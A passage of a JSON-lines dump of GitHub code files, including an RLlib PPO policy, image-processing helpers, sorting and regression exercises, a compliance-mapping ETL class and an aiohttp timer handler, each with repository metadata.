eval_mode_for_validation,\r\n no_best_epoch_num,\r\n val_metric,\r\n drop_path_prob,\r\n transform,\r\n label_fn,\r\n final_layer,\r\n batch_size,\r\n train_args,\r\n train_device,\r\n itr,\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--config\")\r\n parser.add_argument(\"--system\")\r\n parser.add_argument(\"--subset\", default=\"dev\")\r\n parser.add_argument(\"--task\", default=\"cm\")\r\n parser.add_argument(\"--base\", default=\"datasets/asvspoofWavs\")\r\n parser.add_argument(\"--devices\", default=\"cuda:0,cuda:1\")\r\n parser.add_argument(\"--resume\")\r\n args = parser.parse_args()\r\n\r\n with open(args.config) as f:\r\n config = yaml.load(f, Loader=yaml.Loader)\r\n run_train(\r\n config[args.task][args.subset][args.system],\r\n args.base,\r\n args.resume,\r\n args.devices,\r\n )\r\n","repo_name":"andrekassis/Breaking-Security-Critical-Voice-Authentication","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12361,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"2278573239","text":"class Node:\n def __init__(self, val, nxt=None):\n self.val = val\n self.next = nxt\n\n\ndef floyd_cycle_detect(node):\n slow = node\n fast = node\n\n while fast != None and fast.next != None:\n slow = slow.next\n fast = fast.next.next\n\n if slow == fast:\n return True\n\n return False\n","repo_name":"ryanmcdermott/algorithms","sub_path":"floyd_cycle_detect/floyd_cycle_detect.py","file_name":"floyd_cycle_detect.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"31"} +{"seq_id":"8192982178","text":"# REGRESSION TEMPLATE\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\n# # # DATA PRE-PROCESSING # # #\n\n# Importing the data-set\ndataset = pd.read_csv('Regression/Decision Tree Regression/Position_Salaries.csv')\nx = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, 2].values\n\n\n# Feature Scaling\n# sc_x = StandardScaler()\n# x_train = sc_x.fit_transform(x_train)\n# x_test = sc_x.transform(x_test)\n# FITTING REG-RES-SOR TO DATA-SET\n\n# REGRESSOR\nfrom sklearn.tree import DecisionTreeRegressor\nregressor = DecisionTreeRegressor(random_state=0)\nregressor.fit(x, y)\n\n# Predict Result (OPTIONAL)\ny_pred = regressor.predict(6.5)\n\n# VISUALISING THE RESULTS\nx_grid = np.arange(min(x), max(x), 0.01)\nx_grid = x_grid.reshape((len(x_grid)), 1)\nplt.scatter(x, y, color='red')\nplt.plot(x_grid, regressor.predict(x_grid), color='blue')\nplt.title('Decision Tree Regresion')\nplt.xlabel('POS')\nplt.ylabel('MUNEYS')\nplt.show()\n","repo_name":"rairai77/Machine-Learning-and-AI","sub_path":"My Machine Learning Courseware/Regression/Decision Tree Regression/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7324122767","text":"import os\nos.system(\"cls\")\n\n#Entrada\n\njuanD = float(input(\"Ingrese la cantidad que aportará Juan en dólares: \"))\nrosaD = float(input(\"Ingrese la cantidad que aportará Rosa en dólares: \"))\ndanielS = float(input(\"Ingrese la cantidad que aportará Daniel en Soles: \"))\n\n#Proceso\n\n #Convertir el dinero de daniel de soles a dólares\n\ndanielD = danielS / 3.00\n\n #Total en dólares\n\nTotalD = juanD + rosaD + danielD\n\n # Hallando el porcentaje de Juan\nPorcentajeJuan = (juanD * 100) / TotalD\n # Hallando el porcentaje de Rosa\nPorcentajeRosa = (rosaD * 100) / TotalD\n # Hallando el porcentaje de Daniel\nPorcentajeDaniel = (danielD * 100) / TotalD\n \n\n\n#salida\nprint(\" ===== RESULTADOS =========\")\nprint(f\"conversión de soles a dolares de Daniel {danielD:.2f}\")\nprint ( f\"Total de Aportes: {TotalD:.2f} \")\nprint( f\"Parte de Juan : {PorcentajeJuan:.2f}\")\nprint( f\"Parte de Rosa : {PorcentajeRosa:.2f}\")\nprint( f\"Parte de Daniel : {PorcentajeDaniel:.2f}\")\n\n","repo_name":"Eliz4bybug/EJERCICIOS-DE-PYTHON","sub_path":"Ejercicios_Secuenciales/Ejercicio_15.py","file_name":"Ejercicio_15.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20152001258","text":"from ray.rllib.models.action_dist import ActionDistribution\nfrom typing import List, Type, Union\nfrom ray.rllib.evaluation.postprocessing import Postprocessing\nfrom ray.rllib.models.modelv2 import ModelV2\nfrom ray.rllib.models.torch.torch_action_dist import TorchDistributionWrapper\nfrom ray.rllib.policy.policy import Policy\nfrom ray.rllib.policy.sample_batch import SampleBatch\nfrom ray.rllib.utils.framework import try_import_torch\nfrom ray.rllib.utils.torch_ops import explained_variance, sequence_mask\nfrom ray.rllib.utils.typing import TensorType\nfrom ray.rllib.utils.torch_ops import convert_to_torch_tensor\nfrom ray.rllib.agents.ppo.ppo_torch_policy import PPOTorchPolicy, KLCoeffMixin, ValueNetworkMixin\nfrom ray.rllib.policy.torch_policy import LearningRateSchedule, EntropyCoeffSchedule\nfrom ray.rllib.agents.ppo.ppo import PPOTrainer, DEFAULT_CONFIG as PPO_CONFIG\nfrom marllib.marl.algos.utils.mixing_critic import MixingValueMixin, value_mixing_postprocessing\n\ntorch, nn = try_import_torch()\n\n\n# value decomposition based ppo loss\ndef value_mix_ppo_surrogate_loss(\n policy: Policy, model: ModelV2,\n dist_class: Type[TorchDistributionWrapper],\n train_batch: SampleBatch) -> Union[TensorType, List[TensorType]]:\n \"\"\"Constructs the loss for Proximal Policy Objective.\n\n Args:\n policy (Policy): The Policy to calculate the loss for.\n model (ModelV2): The Model to calculate the loss for.\n dist_class (Type[ActionDistribution]: The action distr. class.\n train_batch (SampleBatch): The training data.\n\n Returns:\n Union[TensorType, List[TensorType]]: A single loss tensor or a list\n of loss tensors.\n \"\"\"\n MixingValueMixin.__init__(policy)\n\n logits, state = model(train_batch)\n curr_action_dist = dist_class(logits, model)\n\n # RNN case: Mask away 0-padded chunks at end of time axis.\n if state:\n B = len(train_batch[SampleBatch.SEQ_LENS])\n max_seq_len = logits.shape[0] // B\n mask = sequence_mask(\n train_batch[SampleBatch.SEQ_LENS],\n max_seq_len,\n time_major=model.is_time_major())\n mask = torch.reshape(mask, [-1])\n num_valid = torch.sum(mask)\n\n def reduce_mean_valid(t):\n return torch.sum(t[mask]) / num_valid\n\n # non-RNN case: No masking.\n else:\n mask = None\n reduce_mean_valid = torch.mean\n\n prev_action_dist = dist_class(train_batch[SampleBatch.ACTION_DIST_INPUTS],\n model)\n\n logp_ratio = torch.exp(\n curr_action_dist.logp(train_batch[SampleBatch.ACTIONS]) -\n train_batch[SampleBatch.ACTION_LOGP])\n action_kl = prev_action_dist.kl(curr_action_dist)\n mean_kl_loss = reduce_mean_valid(action_kl)\n\n curr_entropy = curr_action_dist.entropy()\n mean_entropy = reduce_mean_valid(curr_entropy)\n\n surrogate_loss = torch.min(\n train_batch[Postprocessing.ADVANTAGES] * logp_ratio,\n train_batch[Postprocessing.ADVANTAGES] * torch.clamp(\n logp_ratio, 1 - policy.config[\"clip_param\"],\n 1 + policy.config[\"clip_param\"]))\n mean_policy_loss = reduce_mean_valid(-surrogate_loss)\n\n # Compute a value function loss.\n if policy.config[\"use_critic\"]:\n prev_value_fn_out = train_batch[SampleBatch.VF_PREDS]\n value_fn_out = model.value_function()\n\n # add mixing_function\n opponent_vf_preds = convert_to_torch_tensor(train_batch[\"opponent_vf_preds\"])\n vf_pred = value_fn_out.unsqueeze(1)\n all_vf_pred = torch.cat((vf_pred, opponent_vf_preds), 1)\n state = convert_to_torch_tensor(train_batch[\"state\"])\n value_tot = model.mixing_value(all_vf_pred, state)\n\n vf_loss1 = torch.pow(\n value_tot - train_batch[Postprocessing.VALUE_TARGETS], 2.0)\n vf_clipped = prev_value_fn_out + torch.clamp(\n value_tot - prev_value_fn_out, -policy.config[\"vf_clip_param\"],\n policy.config[\"vf_clip_param\"])\n vf_loss2 = torch.pow(\n vf_clipped - train_batch[Postprocessing.VALUE_TARGETS], 2.0)\n vf_loss = torch.max(vf_loss1, vf_loss2)\n mean_vf_loss = reduce_mean_valid(vf_loss)\n # Ignore the value function.\n else:\n vf_loss = mean_vf_loss = 0.0\n\n total_loss = reduce_mean_valid(-surrogate_loss +\n policy.kl_coeff * action_kl +\n policy.config[\"vf_loss_coeff\"] * vf_loss -\n policy.entropy_coeff * curr_entropy)\n\n # Store values for stats function in model (tower), such that for\n # multi-GPU, we do not override them during the parallel loss phase.\n model.tower_stats[\"total_loss\"] = total_loss\n model.tower_stats[\"mean_policy_loss\"] = mean_policy_loss\n model.tower_stats[\"mean_vf_loss\"] = mean_vf_loss\n model.tower_stats[\"vf_explained_var\"] = explained_variance(\n train_batch[Postprocessing.VALUE_TARGETS], model.value_function())\n model.tower_stats[\"mean_entropy\"] = mean_entropy\n model.tower_stats[\"mean_kl_loss\"] = mean_kl_loss\n\n return total_loss\n\n\nVDPPOTorchPolicy = PPOTorchPolicy.with_updates(\n name=\"VDPPOTorchPolicy\",\n get_default_config=lambda: PPO_CONFIG,\n postprocess_fn=value_mixing_postprocessing,\n loss_fn=value_mix_ppo_surrogate_loss,\n mixins=[\n LearningRateSchedule, EntropyCoeffSchedule, KLCoeffMixin,\n ValueNetworkMixin, MixingValueMixin\n ])\n\n\ndef get_policy_class_vdppo(config_):\n if config_[\"framework\"] == \"torch\":\n return VDPPOTorchPolicy\n\n\nVDPPOTrainer = PPOTrainer.with_updates(\n name=\"VDPPOTrainer\",\n default_policy=None,\n get_policy_class=get_policy_class_vdppo,\n)\n","repo_name":"Replicable-MARL/MARLlib","sub_path":"marllib/marl/algos/core/VD/vdppo.py","file_name":"vdppo.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","stars":627,"dataset":"github-code","pt":"31"} +{"seq_id":"28726015800","text":"# 이 문제는 시간, 메모리 제한이 있으므로 파이썬 정렬 라이브러리를 이용하면 시간 초과된다.\n# 따라서 가장 큰 수와 작은 수의 차이가 1000000이하일때 효율적으로 사용 가능한 계수정렬을 이용한다.\n# 이 문제에서 자연수의 범위는 1~10000 이다.\n# 계수정렬의 시간복잡도는 O(N+K) 이다. 모든 데이터가 양의 정수인 상황에서 데이터의 개수가 N, 데이터중 최대값이 K\n# 시간 초과 방지를 위해 입력을 sys라이브러리 통해서 받는다\n\n\nimport sys\nn = int(sys.stdin.readline())\na = [0] * 10001\n\n\nfor _ in range(n):\n a[int(sys.stdin.readline())] += 1\n\nfor i in range(1,10001):\n while a[i] != 0:\n print(i)\n a[i] -= 1\n","repo_name":"sangil1208/AlgorithmPS","sub_path":"Python/Sorting/BOJ_10989.py","file_name":"BOJ_10989.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31420997675","text":"import math\n\nimport cv2\nimport numpy as np\n\n_cascade_path = 'cascade.xml'\ncascade = None\n\ngunakan_library = True\ntampilkan_gambar_tiap_tahap = False\ntampilkan_log = False\n\n_cache_kernel_gaussian = {}\n\n\ndef muat_cascade():\n global cascade\n cascade = cv2.CascadeClassifier(_cascade_path)\n\n\ndef log(message):\n if not tampilkan_log:\n return\n print(message)\n\n\n# tidak digunakan di GUInya langsung\ndef tampilkan(gambar, as_hsv=False):\n if not tampilkan_gambar_tiap_tahap:\n return\n # resize ke 800x600\n gambar = cv2.resize(gambar, (gambar.shape[1] * 600 // gambar.shape[0], 600))\n # tampilkan gambar\n if as_hsv:\n gambar = cv2.cvtColor(gambar, cv2.COLOR_HSV2BGR)\n cv2.imshow('gambar', gambar)\n cv2.waitKey(0)\n\n\ndef buat_gaussian_kernel(ukuran_kernel):\n cached = _cache_kernel_gaussian.get(ukuran_kernel)\n if cached is not None:\n return cached\n kernel = np.zeros((ukuran_kernel, ukuran_kernel))\n x = int(ukuran_kernel / 2)\n y = int(ukuran_kernel / 2)\n for i in range(-x, x + 1):\n for j in range(-y, y + 1):\n kernel[i + x][j + y] = 1 / (2 * math.pi * 1) * math.exp(-(i * i + j * j) / (2 * 1))\n _cache_kernel_gaussian[ukuran_kernel] = kernel\n return kernel\n\n\ndef gaussian_blur_grayscale(gambar, ukuran_kernel):\n if gunakan_library:\n return cv2.GaussianBlur(gambar, (ukuran_kernel, ukuran_kernel), 0)\n # tanpa library\n # calculate gaussian kernel\n kernel = buat_gaussian_kernel(ukuran_kernel)\n hasil = np.zeros(gambar.shape)\n\n kernel_w = (kernel.shape[0]) // 2\n kernel_h = (kernel.shape[1]) // 2\n\n h = gambar.shape[0]\n w = gambar.shape[1]\n\n for i in range(kernel_h, h - kernel_h):\n for j in range(kernel_w, w - kernel_w):\n sum = 0\n for k in range(kernel.shape[0]):\n for l in range(kernel.shape[1]):\n sum += kernel[k][l] * gambar[i - kernel_h + k][j - kernel_w + l]\n hasil[i][j] = sum\n\n return hasil.astype(np.uint8)\n\n\ndef bgr_ke_grayscale(gambar):\n if gunakan_library:\n return cv2.cvtColor(gambar, cv2.COLOR_BGR2GRAY)\n # tanpa library\n hasil = np.zeros((gambar.shape[0], gambar.shape[1]))\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n hasil[i][j] = 0.299 * gambar[i][j][2] + 0.587 * gambar[i][j][1] + 0.114 * gambar[i][j][0]\n return hasil.astype(np.uint8)\n\n\ndef bgr_hsv(b, g, r):\n # ubah uint8 ke int\n b = int(b)\n g = int(g)\n r = int(r)\n v = max(r, g, b)\n if v == 0:\n s = 0\n else:\n s = (v - min(r, g, b)) / v\n\n h = 0\n if r == g == b:\n return 0, 0, v\n else:\n if v == r:\n h = 60 * (g - b) / (v - min(r, g, b))\n elif v == g:\n h = 120 + 60 * (b - r) / (v - min(r, g, b))\n elif v == b:\n h = 240 + 60 * (r - g) / (v - min(r, g, b))\n\n if h < 0:\n h += 360\n\n # convert to 0-180\n h /= 2\n\n return round(h), round(s * 255), round(v)\n\n\ndef hsv_bgr(h, s, v):\n h *= 2\n s /= 255\n v /= 255\n c = s * v\n x = c * (1 - abs((h / 60) % 2 - 1))\n m = v - c\n\n r, g, b = 0, 0, 0\n if 0 <= h < 60:\n r = c\n g = x\n b = 0\n elif 60 <= h < 120:\n r = x\n g = c\n b = 0\n elif 120 <= h < 180:\n r = 0\n g = c\n b = x\n elif 180 <= h < 240:\n r = 0\n g = x\n b = c\n elif 240 <= h < 300:\n r = x\n g = 0\n b = c\n elif 300 <= h < 360:\n r = c\n g = 0\n b = x\n\n r = (r + m) * 255\n g = (g + m) * 255\n b = (b + m) * 255\n\n return round(b), round(g), round(r)\n\n\ndef bgr_ke_hsv(gambar):\n if gunakan_library:\n return cv2.cvtColor(gambar, cv2.COLOR_BGR2HSV)\n # tanpa library\n hasil = np.zeros(gambar.shape)\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n b, g, r = gambar[i][j]\n h, s, v = bgr_hsv(b, g, r)\n hasil[i][j] = [h, s, v]\n return hasil.astype(np.uint8)\n\n\ndef hsv_ke_bgr(gambar):\n if gunakan_library:\n return cv2.cvtColor(gambar, cv2.COLOR_HSV2BGR)\n # tanpa library\n hasil = np.zeros(gambar.shape)\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n h, s, v = gambar[i][j]\n b, g, r = hsv_bgr(h, s, v)\n hasil[i][j] = [b, g, r]\n return hasil.astype(np.uint8)\n\n\ndef hsv_ke_grayscale(gambar):\n if gunakan_library:\n return cv2.cvtColor(cv2.cvtColor(gambar, cv2.COLOR_HSV2BGR), cv2.COLOR_BGR2GRAY)\n # tanpa library\n hasil = np.zeros((gambar.shape[0], gambar.shape[1]))\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n hasil[i][j] = gambar[i][j][2]\n return hasil.astype(np.uint8)\n\n\ndef crop_gambar(gambar, x, y, w, h):\n return gambar[y:y + h, x:x + w].copy()\n\n\ndef operasi_and(gambar, mask):\n if gunakan_library:\n return cv2.bitwise_and(gambar, gambar, mask=mask)\n # mask berupa 0 - 255\n hasil = np.zeros(gambar.shape)\n # gambar bisa berupa grayscale atau BGR\n # mask bisa berupa grayscale atau BGR\n # gambar dan mask bisa berbeda jenis\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n if len(gambar.shape) == 3:\n if len(mask.shape) == 3:\n hasil[i][j] = [gambar[i][j][0] & mask[i][j][0],\n gambar[i][j][1] & mask[i][j][1],\n gambar[i][j][2] & mask[i][j][2]]\n else:\n hasil[i][j] = [gambar[i][j][0] & mask[i][j],\n gambar[i][j][1] & mask[i][j],\n gambar[i][j][2] & mask[i][j]]\n else:\n if len(mask.shape) == 3:\n hasil[i][j] = [gambar[i][j] & mask[i][j][0],\n gambar[i][j] & mask[i][j][1],\n gambar[i][j] & mask[i][j][2]]\n else:\n hasil[i][j] = gambar[i][j] & mask[i][j]\n\n return hasil.astype(np.uint8)\n\n\ndef histogram_equalization(gambar):\n if gunakan_library:\n return cv2.equalizeHist(gambar)\n # tanpa library\n hasil = np.zeros(gambar.shape)\n hist = np.zeros(256)\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n hist[gambar[i][j]] += 1\n for i in range(1, 256):\n hist[i] += hist[i - 1]\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n hasil[i][j] = 255 * hist[gambar[i][j]] / (gambar.shape[0] * gambar.shape[1])\n return hasil.astype(np.uint8)\n\n\ndef filter_biru(img):\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n hue = img[i][j][0]\n sat = img[i][j][1]\n if 100 < hue < 130 or sat < 150:\n img[i][j] = [0, 0, 0]\n return img\n\n\ndef m_dilasi_grayscale(img, ukuran_kernel):\n if gunakan_library:\n kernel = np.ones((ukuran_kernel, ukuran_kernel), np.uint8)\n return cv2.dilate(img, kernel, iterations=1)\n # tanpa library\n hasil = np.zeros((img.shape[0], img.shape[1]))\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n maks = 0\n for k in range(-ukuran_kernel // 2, ukuran_kernel // 2 + 1):\n for l in range(-ukuran_kernel // 2, ukuran_kernel // 2 + 1):\n if 0 <= i + k < img.shape[0] and 0 <= j + l < img.shape[1]:\n maks = max(maks, img[i + k][j + l])\n hasil[i][j] = maks\n return hasil.astype(np.uint8)\n\n\nif __name__ == '__main__':\n # check bgr_hsv dan hsv_bgr\n # untuk mengecek apakah fungsi bgr_hsv dan hsv_bgr sudah benar\n # hasilnya harus sama dengan inputannya\n input_bgr = [25, 25, 25]\n h, s, v = bgr_hsv(*input_bgr)\n print(input_bgr, [h, s, v])\n b, g, r = hsv_bgr(h, s, v)\n print(input_bgr, [b, g, r])\n\n # bandingkan hasilnya dengan fungsi bawaan opencv\n bgr = np.array([[input_bgr]], dtype=np.uint8)\n hsv = cv2.cvtColor(bgr, cv2.COLOR_BGR2HSV)\n print(bgr, hsv)\n","repo_name":"sunarya-thito/sistem-penerjemah-lampu-lalu-lintas","sub_path":"modul.py","file_name":"modul.py","file_ext":"py","file_size_in_byte":8167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9098992918","text":"import ctypes\nimport os\nimport sys\nimport threading\n\n\ndef _linux_gettid():\n \"\"\"Return system thread id or pid in single thread process\"\"\"\n return _libgettid.gettid()\n\n\ndef _universal_gettid():\n \"\"\"Give up and just use Python's threading ident\n\n Some platforms erroneously return None for the main thread's ident. This\n will return 0 instead.\n \"\"\"\n return threading.current_thread().ident or 0\n\n\nif 'linux' in sys.platform:\n try:\n _PATH = os.path.dirname(os.path.abspath(__file__))\n _libgettid = ctypes.cdll.LoadLibrary(\n os.path.join(_PATH, '_libgettid.so'))\n _libgettid.gettid.restype = ctypes.c_int\n _libgettid.gettid.argtypes = []\n except:\n gettid = _universal_gettid\n else:\n gettid = _linux_gettid\nelse:\n gettid = _universal_gettid\n","repo_name":"schmichael/mmstats","sub_path":"mmstats/libgettid.py","file_name":"libgettid.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"31"} +{"seq_id":"30440457624","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\nfrom numba import jit\n\n# %%\n# Values as given in the article synaptic theory of working memory\ntau_d = 0.2 # Sec\ntau_f = 1.5 # Sec\n\n\ndef simple_decay(val, time, tau):\n return (1 - val) / tau\n # Such models may make use of the time variable as well, this can be used\n # to do model the effect of a spike, as well as to treat discretization\n\n\nt = np.linspace(0, 2, 101)\nval = 0\nsol_d = odeint(simple_decay, val, t, (tau_d,))\nsol_f = odeint(simple_decay, val, t, (-tau_f,))\n\n\nplt.figure()\nplt.plot(t * 1000, sol_d)\nplt.plot(t * 1000, sol_f)\nplt.xlabel('ms')\nplt.ylabel('fraction vesicles recovered')\n\n# finding first time instant when recovery is complete (99%)\nfirst_ms = t[np.isclose(sol_d[:, 0], 0.99, atol=0.001)][0] * 1000\nprint(first_ms)\n# if it takes \"first_ms\" seconds for the entire pool to replenish, given a pool size one can calculate the recovery time for a single vesicle\nnum_ves = 20\nves_recovery_time = first_ms / num_ves\nprint(ves_recovery_time)\n# %% prototyping the new release function\nduration = 500\nfreq = 15\ndt = 0.01\ninit_n = 0\ntau_n = 15\ntau_p = 1500\nmax_n = 20\ninit_p = 0\nbase_p = 0.15\ntimes = np.arange(0, duration, dt)\n\nspikes = np.random.rand(times.shape[0]) <= (freq * dt / 1000)\nspikes = times[spikes]\n\ndef test_d():\n n_t = np.zeros_like(times)\n p_t = np.zeros_like(times)\n r_t = np.zeros_like(times)\n n_t[0] = init_n\n p_t[0] = init_p\n\n for i, t in enumerate(times[1:-1]):\n # Find when vesicle pool started replenishment\n past_times = times <= t # Locate indexes of past time bins\n past_max_n_times = times[past_times][n_t[past_times] == max_n] # Look for times in the pest when pool was full\n # Choose the latest of these times, if pool was never full, use beginning of experiment as reference\n if past_max_n_times.size == 0:\n time_since_max_n = t\n else:\n time_since_max_n = t - past_max_n_times[-1]\n\n # Calculate replenished\n replenished = 0 if n_t[i] == max_n else np.isclose(time_since_max_n % tau_n, 0).astype(int)\n\n # Calculate dp\n dp = -(p_t[i] / tau_p) + base_p * (t == spikes).any().astype(int) # Temporary dp=0 for test purposes\n # Calculate p\n p_t[i + 1] = np.clip(p_t[i] + dp, 0, 1)\n # Calculate released\n # r_t[i] = np.round(p_t[i] * n_t[i])\n r_t[i] = (np.random.rand(int(n_t[i])) < p_t[i]).sum()\n # dn = replenished - released\n dn = replenished - r_t[i]\n n_t[i + 1] = n_t[i] + dn\n return n_t, p_t, r_t\n\n\nn_t, p_t, r_t = test_d()\n\nplt.figure()\nplt.subplot(311)\nplt.plot(times, p_t)\nplt.subplot(312)\nplt.plot(times, n_t)\nplt.subplot(313)\nplt.plot(times, r_t)\n\n\n\n","repo_name":"ronimb/temporal-coding","sub_path":"prototyping/mongillo_adjustments.py","file_name":"mongillo_adjustments.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12996342933","text":"# Sukurti norimą sąrašą ir žodyną ir juose:\n\n# Atspausdinti vieną norimą įrašą\n# Pridėti įrašą\n# Ištrinti įrašą\n# pakeisti įrašą\n\n# Išbandyti kitas sąrašų ir žodynų funkcijas: clear(), index(), insert(), remove...\n\n\n\nsarasas = ['labas', 'krabas', 'as', 'mes', 'tu', 'kartu']\nzodynas = {'namas':1994, 'gatve':5, 'pirmadienis':1, 'antradienis':2}\n\n# sarasas.append('noriu')\n# print(sarasas)\n\n# zodynas['treciadienis'] = 3\n# zodynas['ketvirtadienis'] = 4\n# print(zodynas)\n\n# istrinti = sarasas.pop(1)\n# print(sarasas)\n\n# del zodynas['namas']\n# print(zodynas)\n\n# sarasas[2] = 'as_ir_tu'\n# print(sarasas)\n\n# zodynas['namas'] = 2019\n# print(zodynas)\n\n# sarasas.clear()\n# print(sarasas)\n\n# zodynas.clear()\n# print(zodynas)\n\n# a = sarasas.index('as')\n# print(a)\n\n# sarasas.insert(-2, 'labukas')\n# print(sarasas)\n\n# sarasas.remove('tu')\n# print(sarasas)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"vuvusim/intro_kursas_ptu5","sub_path":"uzduotis_5.py","file_name":"uzduotis_5.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71311704087","text":"from CircleGuy import CircleGuy\nfrom Entity import Entity\nfrom Util import clamp\n\nclass Accelerator(Entity):\n \n def __init__(self, accFactor, minAcc, maxAcc):\n Entity.__init__(self)\n \n self.accFactor = accFactor\n self.minAcc = minAcc\n self.maxAcc = maxAcc\n \n def affectEntity(self, entity):\n if isinstance(entity, Accelerator):\n return\n if isinstance(entity, CircleGuy):\n return\n \n dist = self.pos.distance(entity.pos)\n \n accChange = 0.0\n if dist > 0.0:\n accChange = clamp((1.0/dist) * self.accFactor, self.minAcc, self.maxAcc)\n \n # make a vector pointing towards the accelerator\n towardsAcc = self.pos - entity.pos\n towardsAcc.normalize(1.0)\n \n # add some amount of accerlation to entity towards the accelerator\n # at a rate inverse to distance\n entity.acc += towardsAcc * accChange\n","repo_name":"bpeck/ProjectFuschiaFairy","sub_path":"src/gamelib/Accelerator.py","file_name":"Accelerator.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"8886396760","text":"from indictrans import Transliterator\nimport argparse\nfrom tqdm import tqdm\n\ndef transliterate(monofile,outfile, l1, l2):\n trn = Transliterator(source=l1,target=l2,build_lookup=True)\n with open(monofile) as f:\n lines = f.readlines()\n with open(outfile,'w') as w:\n for line in tqdm(lines):\n t13n = trn.transform(line)\n assert(len(t13n.split(\" \")) == len(line.split(\" \")))\n if not t13n.endswith('\\n'):\n t13n = t13n+'\\n'\n w.write(t13n)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--mono',type=str,help='Path to monolingual data')\n parser.add_argument('--outfile',type=str,help='Path to output file')\n parser.add_argument('--l1',type=str,help='Source Language')\n parser.add_argument('--l2',type=str,help='Target Language')\n args = parser.parse_args()\n transliterate(args.mono,args.outfile,args.l1,args.l2)\n","repo_name":"Vaidehi99/OBPE","sub_path":"transliterate_monolingual.py","file_name":"transliterate_monolingual.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"13311113280","text":"from sckg.etl.generic import Generic\n\nclass CSF800171(Generic):\n\n def __init__(self, config):\n super().__init__(config)\n\n def transform(self, regime, regime_list):\n stmts = []\n for control in regime_list:\n subcategory = control['_csf_subcategory']\n identifier = control.get('cui_requirement', None)\n if identifier:\n stmts.append(self.create_control_control_map(\n names={\n 'by_regime': True,\n 'csf_800_171': True,\n 'mapping_regime': 'NIST 800-171r2',\n 'mapped_regime': 'NIST CSF',\n 'mapping_control': identifier,\n 'mapped_control': subcategory,\n 'relationship': 'REFERSTO'\n },\n properties={'mapping': 'csf'}))\n\n return stmts","repo_name":"sckg/sckg","sub_path":"sckg/etl/csf_800_171r2.py","file_name":"csf_800_171r2.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"13361136521","text":"from datetime import (\n datetime,\n timedelta\n)\nfrom http import HTTPStatus\n\nfrom aiohttp import web\n\nfrom app.db_handler.schedule import select_schedule\n\nSECONDS_IN_WEEK = 604800\n\n\nasync def get_timer(request):\n \"\"\" Returns timestamp of next release. If release started returns also max delay. \"\"\"\n\n with await request.app['redis'] as conn:\n timer_value = float((await conn.execute('get', 'timer_value')).decode('utf-8'))\n release_started = int((await conn.execute('get', 'release_started')).decode('utf-8'))\n timer_delay = float((await conn.execute('get', 'timer_delay')).decode('utf-8'))\n\n if release_started:\n return web.json_response({\n 'timer_value': timer_value,\n 'timer_delay': timer_delay})\n\n if timer_value and timer_value > datetime.now().timestamp():\n return web.json_response({'timer_value': timer_value})\n else:\n timer_next_release = await get_schedule_release_time(request.app)\n if timer_next_release:\n await conn.execute('set',\n 'timer_value',\n timer_next_release)\n\n return web.json_response({'timer_value': timer_next_release})\n else:\n return web.json_response({'errors:': 'Empty release schedule'})\n\n\nasync def update_timer(request):\n request_data = await request.json()\n\n try:\n timer_new_value = float(request_data.get('timer_value'))\n\n if timer_new_value > datetime.now().timestamp():\n with await request.app['redis'] as conn:\n await conn.execute('set',\n 'timer_value',\n timer_new_value)\n return web.Response()\n\n except (TypeError, ValueError):\n pass\n\n return web.json_response(\n {'errors': 'Invalid timer value'},\n status=HTTPStatus.BAD_REQUEST\n )\n\n\nasync def reset_timer(request):\n with await request.app['redis'] as conn:\n await conn.execute('set', 'timer_value', 0)\n return web.Response()\n\n\nasync def get_schedule_release_time(app):\n \"\"\" Returns timestamp of upcoming release. \"\"\"\n\n async with app['db'].acquire() as conn:\n schedule = await select_schedule(conn)\n\n now = datetime.now()\n min_diff = float('inf')\n\n for event in schedule:\n event_date = now + 